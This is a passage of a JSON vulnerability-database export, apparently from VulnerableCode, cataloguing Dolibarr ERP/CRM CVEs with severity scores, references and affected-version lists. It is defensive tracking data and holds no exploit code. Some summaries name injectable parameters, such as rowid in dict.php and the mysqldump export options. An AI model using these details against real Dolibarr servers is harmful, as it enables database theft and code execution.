password.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25957","reference_id":"","reference_type":"","scores":[{"value":"0.00326","scoring_system":"epss","scoring_elements":"0.55818","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25957"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/87f9530272925f0d651f59337a35661faeb6f377","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/87f9530272925f0d651f59337a35661faeb6f377"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25957","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25957"},{"reference_url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25957","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25957"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/370744?format=json","purl":"pkg:composer/dolibarr/dolibarr@13.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/76015?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0"}],"aliases":["CVE-2021-25957","GHSA-c32w-3cqh-f6jx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6j9z-c2a6-xyhn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/54629?format=json","vulnerability_id":"VCID-6v7h-3zbv-eqgt","summary":"Dolibarr ERP and CRM malicious executable loading\nDolibarr ERP/CRM 9.0.1 provides a web-based functionality that backs up the database content to a dump file. However, the application performs insufficient checks on the export parameters to mysqldump, which can lead to execution of arbitrary binaries on the server. (Malicious binaries can be uploaded by abusing other functionalities of the application.)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-11200","reference_id":"","reference_type":"","scores":[{"value":"0.0116","scoring_system":"epss","scoring_elements":"0.78899","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-11200"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/01075081cbcd9130a72115cdb50ee61fc394edc1","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/01075081cbcd9130a72115cdb50ee61fc394edc1"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/d6ae62478c8841fdfe58971494818b599f396d4f","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/d6ae62478c8841fdfe58971494818b599f396d4f"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/10984#issuecomment-488297419","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/10984#issuecomment-488297419"},{"reference_url":"https://know.bishopfox.com/advisories/dolibarr-version-9-0-1-vulnerabilities","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://know.bishopfox.com/advisories/dolibarr-version-9-0-1-vulnerabilities"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-11200","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-11200"},{"reference_url":"https://github.com/advisories/GHSA-2rwh-262r-r85j","reference_id":"GHSA-2rwh-262r-r85j","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-2rwh-262r-r85j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/442949?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2"},{"url":"http://public2.vulnerablecode.io/api/packages/106858?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.3"}],"aliases":["CVE-2019-11200","GHSA-2rwh-262r-r85j"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6v7h-3zbv-eqgt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/52645?format=json","vulnerability_id":"VCID-79rb-ssqd-5qd3","summary":"Cross site scripting in dolibarr\nA Cross-site Scripting (XSS) vulnerability exists in the admin/accountant.php file. The fields `town`, `name`, and `Accountant code` can be used to escape double quote protection.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2060","reference_id":"","reference_type":"","scores":[{"value":"0.00511","scoring_system":"epss","scoring_elements":"0.66733","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2060"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/2b5b9957c3010a5db9d1988c2efe5b209b16b47f","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/2b5b9957c3010a5db9d1988c2efe5b209b16b47f"},{"reference_url":"https://huntr.dev/bounties/2acfc8fe-247c-4f88-aeaa-042b6b8690a0","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/2acfc8fe-247c-4f88-aeaa-042b6b8690a0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2060","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2060"},{"reference_url":"https://github.com/advisories/GHSA-8fvr-7945-mg7w","reference_id":"GHSA-8fvr-7945-mg7w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8fvr-7945-mg7w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/86726?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5r6g-nb9m-43h1"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0"}],"aliases":["CVE-2022-2060","GHSA-8fvr-7945-mg7w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-79rb-ssqd-5qd3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/16642?format=json","vulnerability_id":"VCID-7ee4-1bfq-efd3","summary":"Dolibarr has SQL injection vulnerability in the rowid parameter of the admin dict.php\nDolibarr ERP-CRM 8.0.4 contains an SQL injection vulnerability in the rowid parameter of the admin dict.php endpoint that allows attackers to execute arbitrary SQL queries. Attackers can inject malicious SQL code through the rowid POST parameter to extract sensitive database information using error-based SQL injection techniques.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-25710","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11292","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-25710"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-25710","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-25710"},{"reference_url":"https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/8.0.4/dolibarr-8.0.4.zip","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:10Z/"}],"url":"https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/8.0.4/dolibarr-8.0.4.zip"},{"reference_url":"https://www.dolibarr.org","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org"},{"reference_url":"https://www.exploit-db.com/exploits/46095","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:10Z/"}],"url":"https://www.exploit-db.com/exploits/46095"},{"reference_url":"https://www.vulncheck.com/advisories/dolibarr-erp-crm-sql-injection-via-rowid-parameter","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:10Z/"}],"url":"https://www.vulncheck.com/advisories/dolibarr-erp-crm-sql-injection-via-rowid-parameter"},{"reference_url":"https://github.com/advisories/GHSA-xxxg-x793-7fq3","reference_id":"GHSA-xxxg-x793-7fq3","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-xxxg-x793-7fq3"},{"reference_url":"https://www.dolibarr.org/","reference_id":"www.dolibarr.org","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:10Z/"}],"url":"https://www.dolibarr.org/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/442946?format=json","purl":"pkg:composer/dolibarr/dolibarr@8.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@8.0.5"}],"aliases":["CVE-2019-25710","GHSA-xxxg-x793-7fq3"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7ee4-1bfq-efd3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61645?format=json","vulnerability_id":"VCID-8xc8-p2ws-yqar","summary":"Dolibarr ERP and CRM SQLi\nDolibarr ERP/CRM before 10.0.3 allows SQL Injection.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19209","reference_id":"","reference_type":"","scores":[{"value":"0.01557","scoring_system":"epss","scoring_elements":"0.81759","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19209"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://herolab.usd.de/security-advisories/usd-2019-0051","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://herolab.usd.de/security-advisories/usd-2019-0051"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19209","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19209"},{"reference_url":"https://www.dolibarr.org/forum/dolibarr-changelogs","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org/forum/dolibarr-changelogs"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/115188?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VC